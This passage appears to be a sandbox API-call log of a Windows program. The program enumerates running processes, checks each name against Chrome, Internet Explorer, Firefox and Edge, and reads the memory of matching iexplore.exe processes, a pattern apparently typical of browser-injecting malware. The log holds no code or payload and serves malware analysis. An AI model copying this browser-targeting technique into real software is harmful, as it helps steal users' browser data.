	[0236.596] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0236.597] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x78bc
	[0236.597] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.597] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0236.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.598] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.598] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.598] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0236.599] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.599] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.599] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0236.600] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x78c0
	[0236.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.600] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0236.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.600] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.600] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.600] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0236.601] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.601] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.601] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0236.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x78c4
	[0236.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.602] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0236.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.602] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.602] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0236.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.603] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.603] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0236.604] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x78c8
	[0236.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.604] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0236.604] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.604] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.605] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0236.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.605] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.608] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0236.609] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x78cc
	[0236.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.609] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0236.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.610] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.610] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0236.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.611] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.612] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0236.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x78d0
	[0236.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.613] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0236.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.613] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.614] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0236.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.614] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.614] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0236.615] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x78d4
	[0236.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.615] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0236.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.616] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.617] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0236.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.617] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0236.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x78d8
	[0236.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.619] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0236.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.619] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.620] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0236.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.620] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.621] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x78dc
	[0236.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.622] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.623] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.623] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.623] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.624] NtQueryInformationProcess (in: ProcessHandle=0x78dc, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.624] ReadProcessMemory (in: hProcess=0x78dc, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.624] ReadProcessMemory (in: hProcess=0x78dc, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.624] ReadProcessMemory (in: hProcess=0x78dc, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.624] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.625] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x78e0
	[0236.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.625] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.625] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.626] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.626] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.626] NtQueryInformationProcess (in: ProcessHandle=0x78e0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.626] ReadProcessMemory (in: hProcess=0x78e0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.626] ReadProcessMemory (in: hProcess=0x78e0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.627] ReadProcessMemory (in: hProcess=0x78e0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.627] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.627] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.628] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x78e4
	[0236.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.628] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.628] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.628] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.629] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.629] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0236.630] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x78e8
	[0236.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.630] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0236.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.630] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.631] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0236.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.631] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x78ec
	[0236.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.632] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.633] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.633] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.633] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.633] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.634] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x78f0
	[0236.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.635] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.635] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.636] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.636] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.636] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x78f4
	[0236.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.638] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.638] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.639] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.639] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x78f8
	[0236.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.640] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.641] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.641] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.642] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x78fc
	[0236.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.643] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.643] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.644] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.644] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.644] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x7900
	[0236.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.645] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.646] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.646] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.646] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.647] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0236.647] CloseHandle (hObject=0x4fd0) returned 1
	[0236.648] Sleep (dwMilliseconds=0x64) 
	[0236.747] GetCurrentProcessId () returned 0x110
	[0236.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0236.751] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0236.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0236.753] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0236.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7904
	[0236.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.754] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.755] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.755] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.756] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7908
	[0236.757] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.757] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.758] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.758] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.759] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0236.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x790c
	[0236.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.760] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0236.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.761] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.763] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0236.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.763] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7910
	[0236.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
